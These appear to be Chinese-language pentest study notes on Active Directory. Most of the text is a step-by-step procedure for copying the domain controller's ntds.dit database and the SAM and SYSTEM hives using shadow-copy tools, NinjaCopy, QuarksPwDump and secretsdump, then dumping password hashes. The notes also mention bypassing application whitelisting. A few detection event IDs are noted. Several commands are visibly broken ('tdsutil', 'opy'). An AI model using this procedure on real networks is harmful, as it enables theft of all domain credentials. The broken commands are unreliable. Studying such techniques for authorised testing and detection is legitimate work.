「打給賀，挖西飛飛，今天你要來點 Active Directory Security 嗎？」

Computers

• 三種類型
  • Domain Controller：管理 Domain 的中央伺服器
  • Workstation：員工的個人電腦
  • Server：架設網站、系統、資料庫的電腦

Domain Controllers

• 執行 Active Directory Domain Service 的伺服器
• 提供 AD 服務
  • 身份認證
  • 權限授權
  • domain 名解析
• 負責儲存 domain 資料庫的資訊
  • 儲存位置：C:\windows\ntds\ntds.dit
    • 能存取 Domain、User、Group、GPO
    • 包含密碼 Hash Value
  • 駭客的攻擊目標
  • 保護：應只有管理員能查看
• 一個 domain 可能有多個 Domain Controllers
• 提供其他服務
  • DNS、Kerberos、LDAP、SMB、RPC

ntds.dit 攻擊手法

1. Volume Shadow Copy 磁碟區陰影複製服務
   • 用來製作快照的工具，domain 環境預設有安裝
   • 禁止該工具會影響作業系統使用
     • System Restore
     • Windows Server Backup
   • 使用該工具會有event ID：7036
   • 使用方法
     • (1) 查詢目前作業系統的快照

     tdsutil snapshot "List All" quit quit
     tdsutil snapshot "List Mounted" quit quit
     ``
      (2) 建立快照(會取得 GUID)
     - 會有 EventID 98
     ``
     tdsutil snapshot "activate instance ntds" create quit quit
     ``
      (3) 掛載(mount)快照(需使用第二步驟取得的GUID)
     - 會取得快照掛載的路徑如 `C:\$SNAP_202210121012_VOLUMEC$\`
     ``
     tdsutil snapshot "mount {GUID}" quit quit
     ``
      (4) 複製 ntds.dit
     ``
     opy C:\$SNAP_202210121012_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
     ``
      (5) 卸載(unmount)快照
     ``
     tdsutil snapshot  "unmount {GUID}" quit quit
     ``
      (6) 刪除快照
     ``
     tdsutil snapshot  "delete {GUID}" quit quit
     ``
     

2. vssadmin
   • Windows 內建工具
   • 顯示目前硬碟下的快照備份以及與安裝的快照
   • 基礎指令
     • vssadmin list shadows: 列出硬碟中的快照
     • vssadmin list writers: 列出已訂閱的寫入器
   • 步驟
     • (1) 查詢目前的快照
       • vssadmin list shadows
     • (2) 新增快照
       • vssadmin create shadow /for=c:
       • 會取得快照路徑
     • (3) 複製 ntds.dit
       • copy \\?\快照路徑\windows\NTDS\ntds.dit c:\ntds.dit
     • (4) 刪除快照
       • vssadmin delete shadows /for=c: /quiet
3. vshadow.exe

• 非內建的指令工具，可以建立與管理快照
• 步驟
  • (1) 查詢目前的快照
    • vshadow.exe -q
  • (2) 新增快照
    • vshadow.exe -p -nw C:
    • 會取得
      • SnapshotSetID
      • SnapshotID
      • Shadow copy device name
  • (3) 複製 ntds.dit
    • copy Shadow copy device name\windows\NTDS\ntds.dit c:\ntds.dit
  • (4) 刪除快照
    • vshadow -dx={SnapshotSetID}
    • vshadow -ds={SnapshotID}
• 其他應用，執行指令
  • vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:
    • 執行後會背景會有 VSSVC.exe
    • 顯示 Volume Shadow Copy 正在執行
    • 關閉 VSSVC.exe 會有 eventID 7034
  • 可能可以繞過白名單限制(因為有微軟的數位簽章)

4. NinjaCopy
   • PowerSploit 工具
   • 使用

   Import-Module .\invoke-NinjaCopy.ps1
   Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
   Invoke-NinjaCopy -Path   C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
   Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"
   

5. QuarksPwDump
   • Dump Windows 使用者憑證
     • local user
     • domain user
     • cache user
     • Bitlocker
   • ntds.dit 若損毀
     • 使用 esentutl 修復
       • 伺服器資料庫儲存工具，可用來修復損毀的資料庫
     • esentutl /p /o ntds.dit
   • 指令，匯出敏感資料
     • QuarksPwDump.exe --dump-hash-domain --output password.txt --ntds-file c:\ntds.dit
6. secretsdump
   • 速度較慢
   • 指令

   secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
   secretsdump.exe -system system.hive -ntds ntds.dit LOCAL
   

參考資料

• https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
• https://learn.microsoft.com/zh-tw/windows/win32/vss/vshadow-tool-and-sample
• https://github.com/uknowsec/Active-Directory-Pentest-Notes/blob/master/Notes/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%8F%96NTDS.dit.md